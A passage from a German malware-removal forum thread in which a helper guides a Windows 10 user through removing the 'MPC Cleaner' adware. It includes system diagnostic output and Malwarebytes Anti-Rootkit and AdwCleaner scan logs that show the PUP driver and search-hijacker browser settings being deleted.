FirewallRules: [{DA65680E-6E44-4201-B745-F198AC8E3393}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{52257645-0630-45E9-A1FB-39934F6C2678}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{4FE86D86-4126-4CAC-B0C6-0964BDDF3F14}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [{79EA3DA0-E438-4DF1-B00E-395F81892905}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9074E1C2-24F4-4C85-931B-F7C36B46E9F0}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{88748628-27A1-4BE3-A512-B5BEDB3F0CBC}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{1064F6A1-CED6-4E5B-9557-D4C9CE2276C3}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{F2EF9A12-86E9-472C-A3D4-94A1F9A17C0A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{EAA7D367-AABF-426D-BB3F-EF9A70667017}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{98D524D2-5FAB-47A1-8D96-609F4621339A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{54390D52-B160-4427-922D-9E33F5445695}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5AAA1481-9998-4568-8A9B-D962D4EC35DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AFF1319A-917A-4107-A1B8-16C203B38CE3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6E5BD0D9-0928-42F6-B0CC-6822D671F49E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{4EF4C32F-BB8F-4765-B97F-A9006BD42435}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6B0C9A6B-F6E7-4A35-9EB7-6D1B664D401A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D0D01B7E-5143-44D9-AC6A-CC67DA9DC212}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{F3E54CC2-1149-412B-936A-B7B404D80F42}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [TCP Query User{7198F59F-7EF5-4103-881C-0D8F7DF8701B}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [UDP Query User{80C05AF5-C686-4759-B28B-9A8FEF736C4C}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [{277B4264-74AC-4424-97C4-6D6C0796EF8F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{29E298B7-7591-4640-AD04-9B5F1E53CBA1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E35884C9-26D9-4EAD-9D40-2E56C22777E7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{085256D1-31AD-4037-8168-D364B01EBC13}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{B4514ECE-E440-46E1-B1D2-26717681B1E0}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{6A8D13A6-8290-4176-8559-5F33EC7ED562}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{821D4B6B-A2AB-4689-9063-D6F980672A77}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D00ED757-645B-41E0-BFF0-EFEEBB5995ED}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{823DAAEE-6ABF-4B05-BDB9-383B0D21FE83}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{BB735679-47B3-409A-8738-29CA284AA409}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{6EE9145F-17C0-43E7-87FF-67A36AF241E7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{97AB465D-9EFC-47C7-BF64-913694D80FCA}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{19645894-3D5C-4408-A5F6-9B66DFB1DC9F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{AA0EA854-6DFB-4B81-8D5C-1056DC11E33C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1FB21FF6-AB11-484B-8ADB-638F34153E99}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{48F1500B-0F5A-488B-A6C2-4E310ADB9290}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{E2B24A02-1023-4742-AADB-DAF1650CE7CA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2DB1B594-3330-4CBE-9C2C-A9AE295E4933}] => (Allow) C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\chrome.exe
FirewallRules: [{3C2F26B4-E13F-4E26-B187-60BDB19D986F}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{16CB5095-C60B-4A9A-AF40-FFF4FF667E4A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{302047B4-E0E7-4AE6-96B2-BDD4D5C4307D}] => (Allow) A:\iTunes.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4

Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (04/16/2016 10:01:24 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm SndVol.exe, Version 10.0.10240.16384 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1b34

Startzeit: 01d197b0a249f565

Beendigungszeit: 2

Anwendungspfad: C:\Windows\System32\SndVol.exe

Berichts-ID: 676b8fbe-03a9-11e6-9c27-bcaec571bf31

Vollständiger Name des fehlerhaften Pakets: 

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:35 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.


Systemfehler:
=============
Error: (04/19/2016 12:51:53 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Xbox Live Authentifizierungs-Manager" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
%%0

Error: (04/19/2016 12:45:49 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTLokaler DienstS-1-5-19LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (04/19/2016 12:43:47 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Search" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1069

Error: (04/19/2016 12:43:47 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Der Dienst "WSearch" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
%%50

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:19 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "DeleteFlag" aufgrund folgenden Fehlers fehlgeschlagen: 
%%5

Error: (04/19/2016 12:43:19 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen: 
%%5


CodeIntegrity:
===================================
  Date: 2016-04-10 17:34:51.713
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:51.604
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:51.343
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:51.268
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:50.485
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:50.414
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.980
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.908
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.114
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.045
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 27%
Installierter physikalischer RAM: 8173.24 MB
Verfügbarer physikalischer RAM: 5966.08 MB
Summe virtueller Speicher: 16877.24 MB
Verfügbarer virtueller Speicher: 14444.86 MB

==================== Laufwerke ================================

Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:774.42 GB) NTFS
Drive c: (Windows) (Fixed) (Total:59.09 GB) (Free:12.32 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 59.6 GB) (Disk ID: D9E74E88)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=59.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4D282A8D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
Hoffe diesmal ist es richtig

Alt 19.04.2016, 13:32   #5
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Bitte Avira deinstallieren (und auch noch alle Reste von AVG). Das Teil empfehlen wir schon seit Jahren aus mehreren Gründen nicht mehr. Ein Grund ist ne rel. hohe Fehlalarmquote, der zweite Hauptgrund ist, dass die immer noch mit ASK zusammenarbeiten (Avira Suchfunktion geht über ASK). Auch andere Freewareanbieter wie AVG, Avast oder Panda sprangen auf diesen Zug auf; so was ist bei Sicherheitssoftware einfach inakzeptabel. Vgl. Antivirensoftware: Schutz Für Ihre Dateien, Aber Auf Kosten Ihrer Privatsphäre? | Emsisoft Blog

Gib Bescheid wenn Avira weg ist; wenn wir hier durch sind, kannst du auf einen anderen Virenscanner umsteigen, Infos folgen dann im Abschlussposting. Bitte JETZT nix mehr ohne Absprache installieren!

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 19.04.2016, 13:37   #6
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Also soll ich jetzt erstmal Avira nur Deinstallieren ? Oder auch dieses Emsisoft nach der Deinstallation Installieren ? Dein Satz Bitte nichts mehr ohne Absprache hat mich irritiert, ist das jetzt ne Absprache gewesen ?

EDIT: Avira ist komplett aus dem Systeme

Alt 19.04.2016, 14:29   #7
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Malwarebytes Anti-Rootkit (MBAR)

Downloade dir bitte Malwarebytes Anti-Rootkit Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
  • Starte bitte die mbar.exe.
  • Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
  • Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
  • Klicke auf den CleanUp Button und erlaube den Neustart.
  • Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
  • Nach dem Neustart starte die mbar.exe erneut.
  • Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.
Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers



Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 19.04.2016, 14:57   #8
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


So bin deinen Anweisungen Treu gewesen, nur hab ich nicht nur eine mbar-log Datei, ich werde mal alle hier hin posten.

mbar-log-2016-04-19 (15-33-19):

Code:
ATTFilter
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.04.19.04
  rootkit: v2016.04.17.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16766
Harun :: HARUN-PC [administrator]

19.04.2016 15:33:19
mbar-log-2016-04-19 (15-33-19).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 13
Time elapsed: 19 second(s) [aborted]

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\WINDOWS\SYSTEM32\drivers\MPCKpt.sys (PUP.Optional.MorePowerfulCleaner) -> No action taken. [86b15ecd04e175d101d2b0fad78b202a]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
mbar-log-2016-04-19 (15-33-59):

Code:
ATTFilter
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.04.19.04
  rootkit: v2016.04.17.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16766
Harun :: HARUN-PC [administrator]

19.04.2016 15:33:59
mbar-log-2016-04-19 (15-33-59).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 473508
Time elapsed: 9 minute(s), 21 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\WINDOWS\SYSTEM32\drivers\MPCKpt.sys (PUP.Optional.MorePowerfulCleaner) -> Delete on reboot. [86b15ecd04e175d101d2b0fad78b202a]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
mbar-log-2016-04-19 (15-47-22):

Code:
ATTFilter
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.04.19.04
  rootkit: v2016.04.17.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16766
Harun :: HARUN-PC [administrator]

19.04.2016 15:47:22
mbar-log-2016-04-19 (15-47-22).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 472746
Time elapsed: 8 minute(s), 39 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Bittesehr

Alt 19.04.2016, 15:00   #9
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Adware/Junkware/Toolbars entfernen

Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!
Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren!

1. Schritt: adwCleaner

Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).




2. Schritt: JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 19.04.2016, 15:17   #10
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


AdwCleaner:

Code:
ATTFilter
# AdwCleaner v5.112 - Bericht erstellt am 19/04/2016 um 16:11:02
# Aktualisiert am 17/04/2016 von Xplode
# Datenbank : 2016-04-19.4 [Server]
# Betriebssystem : Windows 10 Pro  (X64)
# Benutzername : Harun - HARUN-PC
# Gestartet von : C:\Users\Harun\Downloads\AdwCleaner_5.112 (1).exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****

[-] Dienst gelöscht : MPCProtectService

***** [ Ordner ] *****

[-] Ordner gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
[-] Ordner gelöscht : C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com

***** [ Dateien ] *****

[-] Datei gelöscht : C:\WINDOWS\SysNative\drivers\MPCKpt.sys

***** [ DLLs ] *****


***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****


***** [ Registrierungsdatenbank ] *****

[-] Schlüssel gelöscht : HKLM\SOFTWARE\MPC

***** [ Internetbrowser ] *****

[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.newtab.url", "hxxp://www.yoursearching.com/newtab/?type=nt&ts=1457449062&z=c0daee2b39051a59099a9edgcz9wcm9z2z6t7eaqeo&from=face&uid=SAMSUNGXSSDX830XSeries_S0XXNEAC500477");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.defaultenginename", "yessearches");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.searchengine.hp", "hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.searchengine.sp", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&uid=0AD0C687FD476CAE2DF5F47FFC66340E&v=20160301");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.searchengine.url", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&uid=0AD0C687FD476CAE2DF5F47FFC66340E&v=20160301");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.selectedEngine", "yessearches");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.startup.homepage", "search.mpc.am");

*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [11273 Bytes] - [19/04/2016 12:43:19]
